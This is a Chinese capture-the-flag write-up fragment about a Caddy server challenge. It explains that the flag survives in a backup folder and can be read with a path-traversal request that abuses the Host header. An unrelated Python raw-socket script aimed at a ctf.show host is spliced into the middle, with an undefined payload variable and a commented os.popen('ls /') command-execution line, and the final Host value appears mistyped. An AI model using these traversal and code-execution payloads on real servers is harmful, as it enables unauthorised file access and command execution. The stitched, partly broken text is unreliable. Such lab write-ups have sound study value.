题目是在caddy服务器下进行,在配置文件即dockerfile 中有
command: sh -c "apk add --update openssl nss-tools && rm -rf /var/cache/apk/ && openssl req -x509 -batch -newkey rsa:2048 -nodes -keyout /etc/ssl/private/caddy.key -days 365 -out /etc/ssl/certs/caddy.pem -subj '/C=DK/O=Kalmarunionen/CN=*.caddy.chal-kalmarc.tf' && mkdir -p backups/ && cp -r *.caddy.chal-kalmarc.tf backups/ && rm php.caddy.chal-kalmarc.tf/flag.txt && sleep 1 && caddy run"
###
host = "39a23c3e-1bac-45fd-9f8b-4741a606dc4b.challenge.ctf.show"
port = 33220
reqbyte = f'''POST /code HTTP/1.1
Host: {host}:{port}
Connection: keep-alive
Content-Length: {5 + len(base)}
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
code={base}'''.encode()
s = socket.socket()
s.connect((host, port))
s.send(reqbyte)
fh = s.recv(1024)
print(fh)
#############
# safeos.write(a.index(i),safeos.popen('ls /').read().encode())
即启动docker容器时运行的命令,其中
mkdir -p backups/ && cp -r *.caddy.chal-kalmarc.tf backups/ && rm php.caddy.chal-kalmarc.tf/flag.txt
意为创建 backups文件夹然后把以.caddy.chal-kalmarc.tf结尾的文件夹都复制到里面(备份),最后将原文件里的flag.txt删除
我们要做的是找到备份文件里的flag.txt,即
GET /../flag.txt HTTP/2
Host: backups/php.caddy.chal-kalmarc.tfw